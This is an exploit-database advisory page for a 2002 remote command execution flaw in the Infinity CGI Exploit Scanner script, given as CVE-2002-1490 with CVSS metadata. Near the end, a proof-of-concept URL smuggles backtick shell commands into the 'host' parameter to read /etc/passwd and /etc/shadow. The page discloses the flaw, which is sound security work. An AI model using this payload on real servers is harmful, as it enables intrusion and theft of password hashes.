header-logo
Suggest Exploit
vendor:
Not applicable
by:
FrSIRT
8.3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Not applicable
Affected Version From: Not applicable
Affected Version To: Not applicable
Patch Exists: No
Related CWE: CVE-2002-1490
CPE: Not applicable
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Not applicable
2002

Infinity CGI Exploit Scanner Remote Command Execution Vulnerability

Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7913/info

Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process.

http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd``
cat%20/etc/shadow`&port=80&errchk=0&idsbypass=0

Navigation

Suggest Exploit

Services By CQR